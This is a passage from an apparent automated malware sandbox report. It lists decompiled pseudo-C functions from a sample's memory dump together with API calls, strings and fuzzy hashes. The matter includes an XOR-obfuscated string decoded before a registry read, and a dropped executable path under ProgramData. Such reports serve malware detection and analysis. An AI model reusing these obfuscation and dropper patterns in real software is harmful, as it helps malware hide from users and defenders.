																L68:
																__eflags = _v620 - _t227;
																if(_v620 != _t227) {
																	E00B564B8(_v632);
																}
																__eflags = FindNextFileW(_t303,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t258 = _v648;
															_t280 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t258 - _t199;
															if(_t258 != _t199) {
																E00B63090(_t227, _t289, _t303, _t280 + _t258 * 4, _t199 - _t258, 4, E00B5990C);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t227);
															_push(_t227);
															_push(_t289);
															L33();
															_t227 = _t179;
														}
														L77:
														__eflags = _v656;
														if(_v656 != 0) {
															E00B564B8(_v668);
														}
													} else {
														__eflags = _t245 - _t289 + 1;
														if(_t245 == _t289 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t279);
															_push(0);
															_push(0);
															_push(_t289);
															L33();
														}
													}
													__eflags = _v16 ^ _t310;
													return E00B4AE43(_v16 ^ _t310);
												} else {
													goto L40;
												}
											}
										} else {
											_t210 = 0xc;
											L37:
											return _t210;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t213 = _v12;
									_t264 = _v16;
									 *((intOrPtr*)(_v32 + _t213)) = _t264;
									_t140 = _t213 + 4;
									_t234 = _t264 + _v20;
									_v16 = _t234;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t299 = _t298 | 0xffffffff;
							_v12 = _t299;
							L25:
							E00B564B8(_t223);
							_pop(_t235);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t223;
							_t218 = E00B635A0(_t132,  &_v8);
							_t235 =  *_t294;
							__eflags = _t218;
							if(_t218 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t218);
								_push(_t235);
								L46();
								_t312 = _t312 + 0xc;
								_v12 = _t218;
								_t299 = _t218;
							} else {
								_t219 =  &(_v608.cAlternateFileName);
								_push(_t219);
								_push(_t223);
								_push(_t223);
								_push(_t235);
								L33();
								_t299 = _t219;
								_t312 = _t312 + 0x10;
								_v12 = _t299;
							}
							__eflags = _t299;
							if(_t299 != 0) {
								break;
							}
							_t294 =  &(_a4[1]);
							_a4 = _t294;
							_t132 =  *_t294;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t285 = _v608.cAlternateFileName;
								_t233 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t285 = _v608.cAlternateFileName;
						L26:
						_t273 = _t285;
						_v32 = _t273;
						__eflags = _v40 - _t273;
						asm("sbb ecx, ecx");
						_t237 =  !_t235 & _v40 - _t273 + 0x00000003 >> 0x00000002;
						__eflags = _t237;
						_v28 = _t237;
						if(_t237 != 0) {
							_t301 = _t237;
							do {
								E00B564B8( *_t285);
								_t223 = _t223 + 1;
								_t285 = _t285 + 4;
								__eflags = _t223 - _t301;
							} while (_t223 != _t301);
							_t285 = _v608.cAlternateFileName;
							_t299 = _v12;
						}
						E00B564B8(_t285);
						goto L31;
					}
				} else {
					_t220 = E00B55BBD();
					_t299 = 0x16;
					 *_t220 = _t299;
					E00B528EC();
					L31:
					return _t299;
				}
				L81:
			}

APIs

_free.LIBCMT ref: 00B59B8D

Strings

*?, xrefs: 00B59A36

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: c2ebbc5fb6461f12ea3eedaf0aba459f12cd7cfba1e74b480c8682c6e8ee96b0
Instruction ID: a565a12b500b8cf921e9fc245eb87bf9d80302df92c4a57fbb5e0d512df3660b
Opcode Fuzzy Hash: c2ebbc5fb6461f12ea3eedaf0aba459f12cd7cfba1e74b480c8682c6e8ee96b0
Instruction Fuzzy Hash: F4611975E00219DFDB14CFA9D8816ADFBF5EF48311B2481EAE815E7300D675AE458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B5312D, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00B5312D(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				intOrPtr* _t57;
				signed int _t63;
				intOrPtr _t65;

				_t48 = _a4;
				if(_t48 != 0) {
					if(_t48 == 2 || _t48 == 1) {
						E00B5A638();
						E00B5A085(0, 0xb6a408, 0x104);
						_t26 =  *0xb6a530; // 0x663478
						 *0xb6a520 = 0xb6a408;
						_v20 = _t26;
						if(_t26 == 0 ||  *_t26 == 0) {
							_t26 = 0xb6a408;
							_v20 = 0xb6a408;
						}
						_v8 = 0;
						_v16 = 0;
						_t63 = E00B533DE(E00B53265( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
						if(_t63 != 0) {
							E00B53265( &_v8, _v20, _t63, _t63 + _v8 * 4,  &_v8,  &_v16);
							if(_t48 != 1) {
								_v12 = 0;
								_push( &_v12);
								_t49 = E00B59FB3(_t48, 0, _t63, _t63);
								if(_t49 == 0) {
									_t57 = _v12;
									_t54 = 0;
									_t36 = _t57;
									if( *_t57 == 0) {
										L17:
										_t37 = 0;
										 *0xb6a524 = _t54;
										_v12 = 0;
										_t49 = 0;
										 *0xb6a528 = _t57;
										L18:
										E00B564B8(_t37);
										_v12 = 0;
										goto L19;
									} else {
										goto L16;
									}
									do {
										L16:
										_t36 = _t36 + 4;
										_t54 = _t54 + 1;
									} while ( *_t36 != 0);
									goto L17;
								}
								_t37 = _v12;
								goto L18;
							}
							 *0xb6a524 = _v8 - 1;
							_t43 = _t63;
							_t63 = 0;
							 *0xb6a528 = _t43;
							goto L12;
						} else {
							_t44 = E00B55BBD();
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							L12:
							_t49 = 0;
							L19:
							E00B564B8(_t63);
							_t40 = _t49;
							goto L20;
						}
					} else {
						_t45 = E00B55BBD();
						_t65 = 0x16;
						 *_t45 = _t65;
						E00B528EC();
						_t40 = _t65;
						L20:
						return _t40;
					}
				}
				return 0;
			}

Strings

x4f, xrefs: 00B5317E
C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe, xrefs: 00B53170, 00B53177, 00B531AD

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe$x4f
API String ID: 0-1778276489
Opcode ID: d8b7b5e2b99bc6e6d7ba45559e2fdd70da2ecf88e25e4edb2038e9420e4498f0
Instruction ID: 02310d3229f94a6b4d57073ab50967581eb893d6a5e8e042e055ac31dc8d6865
Opcode Fuzzy Hash: d8b7b5e2b99bc6e6d7ba45559e2fdd70da2ecf88e25e4edb2038e9420e4498f0
Instruction Fuzzy Hash: 2B41B471A00608AFCB21DF998C85B9EBBF8EF94751F1000EAED05E7350DAB58B49CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B42861, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00B42861(void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v27;
				short _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v104;
				void* _v108;
				signed int _t25;
				void* _t33;
				void _t34;
				void _t35;
				void* _t43;
				signed int _t47;
				void* _t54;
				signed int _t55;
				intOrPtr _t57;
				void* _t58;
				void* _t65;
				signed int _t67;

				_t25 =  *0xb69014; // 0x7e8b4fb6
				_v8 = _t25 ^ _t67;
				asm("movaps xmm0, [0xb3dec0]");
				_t43 = 0;
				asm("movups [ebp-0x64], xmm0");
				asm("movaps xmm0, [0xb3db00]");
				_t57 = _a4;
				asm("movups [ebp-0x54], xmm0");
				_v40 = 0xe4edeec7;
				asm("movaps xmm0, [0xb3db10]");
				asm("movups [ebp-0x44], xmm0");
				_v36 = 0xc4a6e0e8;
				asm("movaps xmm0, [0xb3dc30]");
				asm("movups [ebp-0x34], xmm0");
				_v32 = 0xe6e5fbe0;
				_v28 = 0xe9;
				do {
					_t7 = _t43 + 0x40; // 0x40
					 *(_t67 + _t43 - 0x64) =  *(_t67 + _t43 - 0x64) ^ _t7;
					_t43 = _t43 + 1;
				} while (_t43 < 0x4d);
				_v27 = 0;
				if(RegOpenKeyA(0x80000002,  &_v104,  &_v108) == 0) {
					asm("movaps xmm0, [0xb3dab0]");
					_push(_t43);
					asm("movups [ebp-0x14], xmm0");
					E00B42CCF( &_v24, _v108, E00B42D2B( &_v24), _t57);
					_v20 = 0x312a221c;
					_v16 = 0x6923282b;
					_v12 = 0x2f312d;
					_t33 = E00B427DA( &_v20);
					_t54 = _t33;
					_t65 = _t33;
					do {
						_t34 =  *_t54;
						_t54 = _t54 + 1;
					} while (_t34 != 0);
					_t55 = _t54 - _t65;
					_t58 = _t57 - 1;
					do {
						_t35 =  *(_t58 + 1);
						_t58 = _t58 + 1;
					} while (_t35 != 0);
					_t47 = _t55 >> 2;
					memcpy(_t58, _t65, _t47 << 2);
					memcpy(_t65 + _t47 + _t47, _t65, _t55 & 0x00000003);
					RegCloseKey(_v108);
				} else {
				}
				return E00B4AE43(_v8 ^ _t67);
			}

APIs

RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00B428DC

Part of subcall function 00B42CCF: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00B42909,?,00000000,?), ref: 00B42CEB

RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 00B4294D

Strings

-1/, xrefs: 00B4291A
+(#i, xrefs: 00B42913

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: +(#i$-1/
API String ID: 3677997916-1514103559
Opcode ID: 42deae8c889dd1b21425627ae77dde4fc9f3d3aeeb19ec76e65d42073cb822e6
Instruction ID: 2911f4960280917ca233baa0313adecb6af9a4a3fc1bb08931e0b046ce5c1f2a
Opcode Fuzzy Hash: 42deae8c889dd1b21425627ae77dde4fc9f3d3aeeb19ec76e65d42073cb822e6
Instruction Fuzzy Hash: 7031CD60D042499ADB01CFA8D9116FEFBF4FF69308F905258E846B7121EF306B86E761

Uniqueness

Uniqueness Score: -1.00%

Function 00B43AC3, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00B43B0D

Strings

ios_base::eofbit set, xrefs: 00B43AE4
ios_base::badbit set, xrefs: 00B43AD4, 00B43AF5
ios_base::failbit set, xrefs: 00B43ADF, 00B43B13

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: afd5597e6ac436dc35062a42ae5c6f88afabe2c4295df7445a608c748be3308e
Instruction ID: e98a63b64da4b0d6a8e2b40ffcc850e7ad5b8ff5fad6a61714fc5f458a494f11
Opcode Fuzzy Hash: afd5597e6ac436dc35062a42ae5c6f88afabe2c4295df7445a608c748be3308e
Instruction Fuzzy Hash: FFF0906290432C72DB14AA50EC82FDE7AE8DB14B40F2845E8FD8666191D6A09B44A3E0

Uniqueness

Uniqueness Score: -1.00%

Function 00B640BE, Relevance: 6.1, APIs: 4, Instructions: 133
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00B640BE(signed int __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v8;
				intOrPtr _v12;
				intOrPtr _v20;
				int _v24;
				int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				int _t30;
				signed int _t31;
				int _t34;
				intOrPtr* _t36;
				int _t40;
				int _t41;
				void* _t42;
				intOrPtr* _t43;
				void* _t54;
				void* _t56;
				signed int _t58;
				intOrPtr _t59;
				int _t60;
				void* _t63;
				int _t68;

				_t58 = __edx;
				_t50 = _a4;
				E00B64071( &_v44, __edx, _a4, _a8, _a12);
				if((_v44 & _v40) == 0xffffffff || (_v36 & _v32) == 0xffffffff) {
					L28:
					_t59 =  *((intOrPtr*)(E00B55BBD()));
					goto L29;
				} else {
					_t30 = _v24;
					_t60 = _v28;
					_v8 = _t30;
					_t68 = _t30;
					if(_t68 < 0) {
						L25:
						_t31 = E00B572D3(_t50, _a8, _a12, 0);
						_t63 = _t63 + 0x10;
						__eflags = (_t31 & _t58) - 0xffffffff;
						if((_t31 & _t58) == 0xffffffff) {
							goto L28;
						}
						_t34 = SetEndOfFile(E00B5B205(_t50));
						__eflags = _t34;
						if(_t34 != 0) {
							L18:
							_t59 = 0;
							L29:
							E00B572D3(_v20, _v44, _v40, 0);
							return _t59;
						}
						 *((intOrPtr*)(E00B55BBD())) = 0xd;
						_t36 = E00B55BAA();
						 *_t36 = GetLastError();
						goto L28;
					}
					if(_t68 > 0 || _t60 != 0) {
						_t62 = E00B598AF(0x1000, 1);
						_pop(_t54);
						if(_t38 != 0) {
							_v12 = E00B537CE(_t54, _t50, 0x8000);
							_t40 = _v24;
							_pop(_t56);
							do {
								__eflags = _t40;
								if(__eflags < 0) {
									L12:
									_t41 = _t60;
									L13:
									_t42 = E00B62B23(_t50, _t62, _t41);
									_t63 = _t63 + 0xc;
									__eflags = _t42 - 0xffffffff;
									if(_t42 == 0xffffffff) {
										_t43 = E00B55BAA();
										__eflags =  *_t43 - 5;
										if( *_t43 == 5) {
											 *((intOrPtr*)(E00B55BBD())) = 0xd;
										}
										L21:
										_t59 =  *((intOrPtr*)(E00B55BBD()));
										E00B564B8(_t62);
										goto L29;
									}
									asm("cdq");
									_t60 = _t60 - _t42;
									_t40 = _v8;
									asm("sbb eax, edx");
									_v8 = _t40;
									__eflags = _t40;
									if(__eflags > 0) {
										L11:
										_t41 = 0x1000;
										goto L13;
									}
									if(__eflags < 0) {
										break;
									}
									goto L16;
								}
								if(__eflags > 0) {
									goto L11;
								}
								__eflags = _t60 - 0x1000;
								if(_t60 < 0x1000) {
									goto L12;
								}
								goto L11;
								L16:
								__eflags = _t60;
							} while (_t60 != 0);
							E00B537CE(_t56, _t50, _v12);
							E00B564B8(_t62);
							_t63 = _t63 + 0xc;
							goto L18;
						}
						 *((intOrPtr*)(E00B55BBD())) = 0xc;
						goto L21;
					} else {
						__eflags = _t30;
						if(__eflags > 0) {
							goto L18;
						}
						if(__eflags < 0) {
							goto L25;
						}
						__eflags = _t60;
						if(_t60 >= 0) {
							goto L18;
						}
						goto L25;
					}
				}
			}

APIs

_free.LIBCMT ref: 00B6418E
_free.LIBCMT ref: 00B641B7
SetEndOfFile.KERNEL32(00000000,00B61DBD,00000000,00B5892B,?,?,?,?,?,?,?,00B61DBD,00B5892B,00000000), ref: 00B641E9
GetLastError.KERNEL32(?,?,?,?,?,?,?,00B61DBD,00B5892B,00000000,?,?,?,?,00000000), ref: 00B64205

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 80191501e28c0e673917e0179c596f20658d255179288758a1b81c6253488787
Instruction ID: b16e1182c33a568e9ca160cedfa427e1d3be451392f3ae004efdacc18f5bf796
Opcode Fuzzy Hash: 80191501e28c0e673917e0179c596f20658d255179288758a1b81c6253488787
Instruction Fuzzy Hash: 8141C572900A099BDB21AFA8CC46B9E3BF5EF56761F2401D1F924F7291EB7CC8844760

Uniqueness

Uniqueness Score: -1.00%

Function 00B61292, Relevance: 6.1, APIs: 4, Instructions: 90
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B61292(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, struct _SECURITY_ATTRIBUTES* _a12, struct _SECURITY_ATTRIBUTES* _a16, int _a20, long _a24, void* _a28, intOrPtr _a32, struct _STARTUPINFOW* _a36, struct _PROCESS_INFORMATION* _a40) {
				char _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v28;
				char _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				char _v52;
				char _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				char _v76;
				void* _t43;
				void* _t54;
				WCHAR* _t55;
				void* _t56;
				WCHAR* _t60;

				_t56 = __ecx;
				_t55 = 0;
				_t60 = 0;
				_v76 = 0;
				_v72 = 0;
				_v68 = 0;
				_v64 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = E00B55F7B(_t56, _a4,  &_v76, E00B56E67(__eflags));
				_t66 = _t43;
				if(_t43 == 0 && E00B55F7B(_t56, _a8,  &_v52, E00B56E67(_t66)) == 0) {
					_t68 = _a32;
					if(_a32 == 0) {
						L5:
						_t55 = CreateProcessW(_v68, _v44, _a12, _a16, _a20, _a24, _a28, _t55, _a36, _a40);
					} else {
						_t54 = E00B55F7B(_t56, _a32,  &_v28, E00B56E67(_t68));
						_t60 = _v20;
						if(_t54 == 0) {
							_t55 = _t60;
							goto L5;
						}
					}
				}
				if(_v8 != 0) {
					E00B564B8(_t60);
				}
				if(_v32 != 0) {
					E00B564B8(_v44);
				}
				if(_v56 != 0) {
					E00B564B8(_v68);
				}
				return _t55;
			}

APIs

CreateProcessW.KERNEL32 ref: 00B61347
_free.LIBCMT ref: 00B61356
_free.LIBCMT ref: 00B61365
_free.LIBCMT ref: 00B61374

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$CreateProcess
String ID:
API String ID: 1318292368-0
Opcode ID: 9abf3f59dec7738373ee7c7b24e3141faa590b483cd3c49e1cbf56ea28e31277
Instruction ID: d35880490adda1be497933f2e34576433cb77927d0b2cb602a43e394e7c0a445
Opcode Fuzzy Hash: 9abf3f59dec7738373ee7c7b24e3141faa590b483cd3c49e1cbf56ea28e31277
Instruction Fuzzy Hash: D231EBB2C01258AFCF11AF99D881ADEBFF9FF08315F9841AAF908B2211D6354955CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00B59924, Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B59924(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E00B5A975(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(_t16 != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E00B5A975(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(_t17 != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E00B55B87(GetLastError());
									_t19 =  *((intOrPtr*)(E00B55BBD()));
								}
								L14:
								return _t19;
							}
							_t19 = E00B59EF0(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E00B55B87(GetLastError());
						return  *((intOrPtr*)(E00B55BBD()));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E00B59EF0(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E00B55F9A(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

APIs

Part of subcall function 00B55F9A: _free.LIBCMT ref: 00B55FA8

Part of subcall function 00B5A975: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00B592F5,?,00000000,00000000), ref: 00B5AA17

GetLastError.KERNEL32 ref: 00B5998C
__dosmaperr.LIBCMT ref: 00B59993
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00B599D2
__dosmaperr.LIBCMT ref: 00B599D9

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 6503bc535637dc72e53064d936e970df4a2bae668eedb984428f680375a719cd
Instruction ID: 77722598bce5edc114ee1278fa956b2e6e290f8ca5e4322754606e974d58f8e0
Opcode Fuzzy Hash: 6503bc535637dc72e53064d936e970df4a2bae668eedb984428f680375a719cd
Instruction Fuzzy Hash: 3021B271604619EF9B20AFA18C81A6AB7EDEF0536671041DDFD6893140EB35EC488BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B5830D, Relevance: 6.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00B5830D(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0xb69310; // 0x7
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00B5DBB7(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E00B598AF(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E00B5DBB7(__eflags,  *0xb69310, _t51);
							if(__eflags != 0) {
								E00B58137(_t60, _t51, 0xb6a8cc);
								E00B564B8(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E00B5DBB7(__eflags,  *0xb69310, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E00B5DBB7(0,  *0xb69310, 0);
							_push(0);
							L9:
							E00B564B8();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E00B5DB78(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0xb69310; // 0x7
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E00B55E69(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0xb69310; // 0x7
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E00B5DBB7(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E00B598AF(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E00B5DBB7(__eflags,  *0xb69310, _t60);
								if(__eflags != 0) {
									E00B58137(_t60, _t60, 0xb6a8cc);
									E00B564B8(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E00B5DBB7(__eflags,  *0xb69310, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E00B5DBB7(__eflags,  *0xb69310, _t20);
								_push(_t60);
								L25:
								E00B564B8();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E00B5DB78(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0xb69310; // 0x7
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E00B55E69(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0xb69310; // 0x7
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E00B5DBB7(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E00B598AF(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E00B5DBB7(__eflags,  *0xb69310, _t54);
											if(__eflags != 0) {
												E00B58137(_t61, _t54, 0xb6a8cc);
												E00B564B8(0);
												goto L45;
											} else {
												_t40 = 0;
												E00B5DBB7(__eflags,  *0xb69310, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E00B5DBB7(0,  *0xb69310, 0);
											_push(0);
											L41:
											E00B564B8();
											goto L36;
										}
									}
								} else {
									_t54 = E00B5DB78(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0xb69310; // 0x7
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

APIs

GetLastError.KERNEL32(00000000,00000001,00000004,00B51A0E,00000001,00000000,00000002,?,00B58F84,00000002,00000000,00000001,00000002), ref: 00B58312
_free.LIBCMT ref: 00B5836F
_free.LIBCMT ref: 00B583A5
SetLastError.KERNEL32(00000000,00000007,000000FF,?,00B58F84,00000002,00000000,00000001,00000002), ref: 00B583B0

Memory Dump Source

